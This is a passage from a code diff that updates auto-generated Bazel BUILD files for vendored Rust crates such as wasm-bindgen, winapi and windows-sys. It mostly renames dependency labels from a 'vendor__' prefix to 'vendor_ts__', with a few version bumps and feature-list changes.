"@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.13.3+wasi-0.2.2", + deps = [ + "@vendor_ts__wit-bindgen-rt-0.33.0//:wit_bindgen_rt", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel index 13e98ffd7af3..52ec9171a917 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel @@ -37,7 +37,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__wasm-bindgen-macro-0.2.99//:wasm_bindgen_macro", + "@vendor_ts__wasm-bindgen-macro-0.2.99//:wasm_bindgen_macro", ], rustc_flags = [ "--cap-lints=allow", @@ -90,9 +90,9 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__wasm-bindgen-0.2.99//:build_script_build", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__wasm-bindgen-0.2.99//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel index 63a6bbad2db6..8e6b5f0e47a7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel @@ -85,11 +85,11 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__bumpalo-3.16.0//:bumpalo", - "@vendor__log-0.4.22//:log", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", + "@vendor_ts__bumpalo-3.16.0//:bumpalo", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel index 548b449cf6fb..c0b07b27ac27 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel @@ -85,7 +85,7 @@ rust_proc_macro( }), version = "0.2.99", deps = [ - "@vendor__quote-1.0.38//:quote", - "@vendor__wasm-bindgen-macro-support-0.2.99//:wasm_bindgen_macro_support", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__wasm-bindgen-macro-support-0.2.99//:wasm_bindgen_macro_support", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel index 2d299b317f80..97d5fe34087e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel @@ -85,10 +85,10 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__wasm-bindgen-backend-0.2.99//:wasm_bindgen_backend", - "@vendor__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__wasm-bindgen-backend-0.2.99//:wasm_bindgen_backend", + "@vendor_ts__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel index 2842ddd46580..c22eb09d6269 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__wasm-bindgen-shared-0.2.99//:build_script_build", + "@vendor_ts__wasm-bindgen-shared-0.2.99//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel index 6a1b6359aa4b..d80dd87d6905 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel @@ -89,7 +89,7 @@ rust_library( }), version = "0.3.9", deps = [ - "@vendor__winapi-0.3.9//:build_script_build", + "@vendor_ts__winapi-0.3.9//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel index b4756544ab6e..2251d0123cd5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.4.0", deps = [ - "@vendor__winapi-i686-pc-windows-gnu-0.4.0//:build_script_build", + "@vendor_ts__winapi-i686-pc-windows-gnu-0.4.0//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel index 74cade3e6823..cdb2fccbf698 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel @@ -82,13 +82,13 @@ rust_library( version = "0.1.9", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel index 3a0a95027ff6..4de908b91117 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.4.0", deps = [ - "@vendor__winapi-x86_64-pc-windows-gnu-0.4.0//:build_script_build", + "@vendor_ts__winapi-x86_64-pc-windows-gnu-0.4.0//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel index e55c7e5da8d1..89ebc463e004 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.52.0", deps = [ - "@vendor__windows-targets-0.52.6//:windows_targets", + "@vendor_ts__windows-targets-0.52.6//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel index 2addd7c9aa43..744659daedf9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel @@ -40,7 +40,6 @@ rust_library( "Win32_System_IO", "Win32_System_Pipes", "Win32_System_Threading", - "Win32_System_WindowsProgramming", "default", ], crate_root = "src/lib.rs", @@ -96,6 +95,6 @@ rust_library( }), version = "0.48.0", deps = [ - "@vendor__windows-targets-0.48.5//:windows_targets", + "@vendor_ts__windows-targets-0.48.5//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel index 8d2ee2174e1b..ab36b4cfa4e0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel @@ -28,14 +28,6 @@ rust_library( "WORKSPACE.bazel", ], ), - crate_features = [ - "Win32", - "Win32_Foundation", - "Win32_System", - "Win32_System_ProcessStatus", - "Win32_System_Threading", - "default", - ], crate_root = "src/lib.rs", edition = "2021", rustc_flags = [ @@ -89,6 +81,6 @@ rust_library( }), version = "0.52.0", deps = [ - "@vendor__windows-targets-0.52.6//:windows_targets", + "@vendor_ts__windows-targets-0.52.6//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel index 3edea90968f3..9b2c722558cc 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel @@ -31,12 +31,17 @@ rust_library( crate_features = [ "Win32", "Win32_Foundation", + "Win32_Security", "Win32_Storage", "Win32_Storage_FileSystem", "Win32_System", "Win32_System_Com", "Win32_System_Console", + "Win32_System_IO", + "Win32_System_ProcessStatus", "Win32_System_SystemInformation", + "Win32_System_Threading", + "Win32_System_WindowsProgramming", "Win32_UI", "Win32_UI_Shell", "default", @@ -94,6 +99,6 @@ rust_library( }), version = "0.59.0", deps = [ - "@vendor__windows-targets-0.52.6//:windows_targets", + "@vendor_ts__windows-targets-0.52.6//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel index 8d59fbf6b521..f235fb732a5a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel @@ -82,22 +82,22 @@ rust_library( version = "0.48.5", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows_aarch64_msvc-0.48.5//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_aarch64_msvc-0.48.5//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows_i686_msvc-0.48.5//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_i686_msvc-0.48.5//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__windows_i686_gnu-0.48.5//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(windows_raw_dylib))) + "@vendor_ts__windows_i686_gnu-0.48.5//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows_x86_64_msvc-0.48.5//:windows_x86_64_msvc", # cfg(all(target_arch = "x86_64", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_msvc-0.48.5//:windows_x86_64_msvc", # cfg(all(target_arch = "x86_64", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel index 854e7e0b060a..c979bc50d9d1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel @@ -82,22 +82,22 @@ rust_library( version = "0.52.6", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows_aarch64_msvc-0.52.6//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_aarch64_msvc-0.52.6//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows_i686_msvc-0.52.6//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_i686_msvc-0.52.6//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__windows_i686_gnu-0.52.6//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_i686_gnu-0.52.6//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows_x86_64_msvc-0.52.6//:windows_x86_64_msvc", # cfg(all(any(target_arch = "x86_64", target_arch = "arm64ec"), target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_msvc-0.52.6//:windows_x86_64_msvc", # cfg(all(any(target_arch = "x86_64", target_arch = "arm64ec"), target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel index d43430783ad6..362ee5153396 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_aarch64_gnullvm-0.48.5//:build_script_build", + "@vendor_ts__windows_aarch64_gnullvm-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel index 28d57204eab3..d4a56f926807 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_aarch64_gnullvm-0.52.6//:build_script_build", + "@vendor_ts__windows_aarch64_gnullvm-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel index 8b9d61a37fcc..7b60315c4658 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_aarch64_msvc-0.48.5//:build_script_build", + "@vendor_ts__windows_aarch64_msvc-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel index 4ea07829b8e5..7aaf3e56924b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_aarch64_msvc-0.52.6//:build_script_build", + "@vendor_ts__windows_aarch64_msvc-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel index 1f1ccff3723e..45cf7592d1a8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_i686_gnu-0.48.5//:build_script_build", + "@vendor_ts__windows_i686_gnu-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel index e97f0d525e95..c31f565b76c6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_i686_gnu-0.52.6//:build_script_build", + "@vendor_ts__windows_i686_gnu-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel index abd74fe822ee..7f37dcce3068 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_i686_gnullvm-0.52.6//:build_script_build", + "@vendor_ts__windows_i686_gnullvm-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel index 6a1d284815b4..98eef82ece69 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_i686_msvc-0.48.5//:build_script_build", + "@vendor_ts__windows_i686_msvc-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel index 557e0069dbce..d09383b28359 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_i686_msvc-0.52.6//:build_script_build", + "@vendor_ts__windows_i686_msvc-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel index 993ddafbaf99..14508675b586 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_x86_64_gnu-0.48.5//:build_script_build", + "@vendor_ts__windows_x86_64_gnu-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel index 665a23a53619..eb1219c681ce 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_x86_64_gnu-0.52.6//:build_script_build", + "@vendor_ts__windows_x86_64_gnu-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel index 703625bfdca9..71285899742a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_x86_64_gnullvm-0.48.5//:build_script_build", + "@vendor_ts__windows_x86_64_gnullvm-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel index d4a3464e1176..678e71b4da5f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_x86_64_gnullvm-0.52.6//:build_script_build", + "@vendor_ts__windows_x86_64_gnullvm-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel index bcc41e3bef94..9d9664ccbd46 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - 